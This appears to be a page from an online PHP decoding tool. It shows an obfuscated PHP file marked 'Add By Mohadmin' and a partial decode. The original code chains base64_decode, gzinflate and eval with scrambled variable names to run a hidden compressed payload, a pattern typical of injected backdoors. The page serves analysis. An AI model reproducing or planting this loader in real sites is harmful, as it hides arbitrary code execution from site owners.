Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /* Add By Mohadmin */ $keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90d..

Decoded Output download

if(!function_exists("rotencode")){function rotencode($string,$amount) { $key = substr($string, 0, 1); if(strlen($string)==1) { return chr(ord($key) + $amount); } else { return chr(ord($key) + $amount) . rotEncode(substr($string, 1, strlen($string)-1), $amount); }}}

Did this file decode correctly?

Original Code

<?php 
 /* Add By Mohadmin */
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
eval(gzinflate(base64_decode('hY7NCoJAFIVf5SQu5tIUzVpc9hxSeq0huwPzA4X47ikxEm7anu/82V7t+iRttE4aftkQgyq8iyyt67ggGjPFqqoyRG/lpsvL0yWJhBHlg9+oEdJ1ZqsBJw1DFWyvZmVgyYTq2iwxzzF5QXv3yvlOLS2EPXJxhQk8BP7vxHH5d/7+274wGpv5gyH9uzJNHw==')));
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
$keystroke2 = $O0O0O0O0O0O0("xes26:tr5bzf{8ydhog`uw9omvl7kicjp43nq", -1);
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
eval($OO000OO000OO(base64_decode('LZJHjq
NaAAAvM9J0i4WJD9BoFmCyyRk2owc8jE02JpjT/1
78RdUFqtAGu69fjoPj+P/6KuCCAP2vQuVYoa/fZh
lqz9nWBUHyhqOb1jWRrkxlqAspEtdiyOyqixWxve
9qgbkxS6YVjWW3OmW5UtylvSa4qV5ri/cvxnLUxk
aBooccuXNlKNpD4WXiBiCJe9mOmL55PhVtxOIdy1
kzs9pYJ40ZM3HFH7Q8dJzwbBuHl+vNZ6xRym6YoD
lz4I3XeKIaig0z1yCbl91fVBBB9yIBrxGL3GPVZG
1xUmdX5B6OgNueOpeZWF75QKdTOhWz+hnGDpueW0
0w7Ke4peIGhQYx/tNeJGhnO/9gnfNVjxPx8LGJCd
3W9iPKY2DLcQG3CNFaqXsIFsahszsibFqSzrsUAF
wetJOSU73EwFumkxv3oCIUfErCGdl2c0Dk09TlIz
W9sxgGIrOE3ypcZMe7O+XnYtaRq0HQBLk0luZjry
G7Rkt4L/D0bejGGmuSMXSCqqbH9Bz0fZ6gZqqR9q
xPg6nbz2BIId8ZkazuqvZTbD0DUAXnzoXyrhB1Qk
gomBxzLKcq0XvHFOGM8reWrp1B3jH5nt57yGDSZe
mHWHLCz3BkzcqD5UNlAfYOqWri065FcO70ZDGD4I
oTWDTO8yM1H4tK3IzrtleKZ21aDF7WCbqR9Za6YK
Pu0tqwUpJZpu31kYCsMZqcJSEHEfkAdTTtW+1CAw
sJzOkuhoCqFSDorioMzPgI38f62S9o7PTeX3IyFZ
QnrCXOSBx2lgcqzo/m/RQD7Xg5rx3UDsa3uAC4Nm
dS5VWtBz76bJE8STtvjiJ+WfLI6c0JUxXOWLTE8b
SRQklVfOS8bytj662Wxtt4A1CYlXdxa+sXE1etHq
ULoNu3YlkmAUo+DpmfEbVupgFivdE3ETWjwnPdsu
h8w06tYLLrGNv6RTnxoOeJK7FXgtXmSvfubkieN8
H1oYaNvYUwFvhXw9wtWkvZu1YR4MajS03xP1AXTN
j//v39/f395z8=')));
?>

Function Calls

gzinflate 1
base64_decode 2

Variables

$keystroke1 wdr159sq4ayez7xcgnf_tv8nluk6jhbio32mp

Stats

MD5 d38e16ae8b7506ca2428c34dd4b5b152
Eval Count 1
Decode Time 45 ms